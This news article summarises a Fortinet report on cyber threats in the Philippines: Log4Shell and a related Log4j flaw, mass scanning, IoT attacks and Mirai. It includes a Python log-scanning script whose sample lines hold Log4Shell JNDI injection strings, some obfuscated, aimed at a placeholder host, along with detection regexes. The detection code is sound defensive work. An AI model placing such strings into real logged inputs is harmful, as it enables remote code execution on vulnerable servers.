Phl continues to experience cyber threats – Fortinet


The Philippines continued to experience cyber threats affecting the Internet, applications and devices during the first quarter of the year.

Fortinet shared that a zero-day vulnerability, officially labeled CVE-2021-44228 and popularly known as Log4Shell, was discovered in Log4j, the Java logging library maintained by Apache. It has the potential for wide-scale impact across most Java applications, including business systems that record log information. This zero-day exploit, first discovered on December 9, 2021 in version 2 of the log4j library, was one of the most detected exploitation techniques in the Philippines.

This vulnerability should be taken seriously: it is trivial to exploit, yet it permits a remote attacker to achieve full remote code execution (RCE) on vulnerable systems. The ubiquitous nature of Log4j is part of what makes CVE-2021-44228 so dangerous. Millions of applications, such as iCloud, Steam, and Minecraft, use Log4j for logging. An attacker simply needs to get the application to log a specially crafted string to exploit the vulnerability. So far, these cloud services and applications have all been found vulnerable.

Fortinet describes how the exploit works. Once a target has been selected, the attacker adds a JNDI query to a connection request to that target, placed in a field that is likely to be logged via Log4j. A vulnerable version of Log4j then takes that request and attempts to contact the ‘malicious-server host’ with an LDAP query. Should the connection succeed, the malicious server under the attacker's control replies to the query by inserting the location of a malicious Java class file into the directory data. The Java implementation on the target then downloads that class file and executes it.


Log4Shell can potentially compromise millions of devices across the Internet. In light of this, FortiGuard Labs released the IPS signature “Apache Log4j Error Log Remote Code Execution” to detect and mitigate exploit attempts; it was initially released in IPS package version 19.215.
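As an added illustration of what such detection has to cope with (example code written for this page, not Fortinet's signature or the Log4j project's code), the script below scans constructed web-server log lines for JNDI lookup strings. It first collapses the lookup wrappers that Log4j itself would resolve before performing the JNDI lookup, so that a naive literal match can be compared against the normalized result.

```python
import re

# Constructed sample access-log lines (not from the original article).
# The quoted User-Agent field at the end is a value that commonly gets logged.
SAMPLE_LOGS = [
    '10.0.0.5 - - "GET /index.html HTTP/1.1" 200 "Mozilla/5.0"',
    '10.0.0.7 - - "GET /login HTTP/1.1" 200 "${jndi:ldap://example.invalid/a}"',
    '10.0.0.9 - - "GET /api HTTP/1.1" 200 "${${lower:j}ndi:${lower:l}dap://example.invalid/b}"',
    '10.0.0.11 - - "GET /x HTTP/1.1" 200 "${${::-j}ndi:rmi://example.invalid/c}"',
    '10.0.0.12 - - "GET /y HTTP/1.1" 200 "plain ${date:yyyy} text"',
]

# Innermost lookup wrappers only (no nested "${" inside): the case-mapping
# lookups ${lower:x}/${upper:x}, and the default-value form ${...:-x}.
INNER = re.compile(r"\$\{(?:lower|upper):([^${}]*)\}|\$\{(?:[^${}:]*:)*-([^${}]*)\}")

# The JNDI lookup with the URI schemes the JNDI provider can dispatch on.
JNDI = re.compile(r"\$\{jndi:(ldap|ldaps|rmi|dns|iiop|corba|nds|http)://", re.I)


def normalize(text):
    """Repeatedly collapse innermost wrappers until the text stops changing."""
    prev = None
    while prev != text:
        prev = text
        text = INNER.sub(
            lambda m: m.group(1) if m.group(1) is not None else m.group(2), text
        )
    return text


def naive_scan(lines):
    """Line numbers containing the literal '${jndi:' (misses wrapped forms)."""
    return [n for n, line in enumerate(lines, 1) if "${jndi:" in line]


def scan(lines):
    """(line number, lower-cased JNDI scheme) for every line with a lookup."""
    hits = []
    for n, line in enumerate(lines, 1):
        match = JNDI.search(normalize(line))
        if match:
            hits.append((n, match.group(1).lower()))
    return hits


if __name__ == "__main__":
    print("naive:", naive_scan(SAMPLE_LOGS))
    print("normalized:", scan(SAMPLE_LOGS))
```

The normalized pass flags three lines where the literal match flags one; a production signature would also need to handle other lookup types and the encoding of the transport layer it inspects.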

The second vulnerability, labeled CVE-2021-45046, causes a Denial of Service (DoS) condition when successfully exploited. Threat actors wasted no time in leveraging Log4Shell, deploying new malware and potentially unwanted programs (PUPs) to compromise vulnerable machines. It was also revealed that successful exploitation could achieve an information leak, remote code execution in some environments, and local code execution in all environments.

In addition, a considerable increase in mass scanning was detected; such scans allow an adversary to identify services on the target system and carry out further attacks based on the findings. Adversaries may perform different forms of active scanning depending on the information they seek to gather, and the scans can be performed in various ways, including using native features of network protocols. FortiLabs also detected many attacks related to remote code execution on IoT devices and home routers, which allow the adversary to gain control over vulnerable systems.

Meanwhile, Mirai continues to be the botnet campaign that registers the most activity in the Philippines. Mirai is a Linux IoT malware that causes infected machines to join a botnet (T1584.005) [16] used for Distributed Denial of Service (DDoS) attacks. FortiLabs is also aware of a new Mirai variant spreading via CVE-2021-44228 (Log4Shell). Given that the vulnerability was only disclosed on December 9, 2021, this is possibly the first Mirai variant equipped with embedded Log4Shell exploit code.
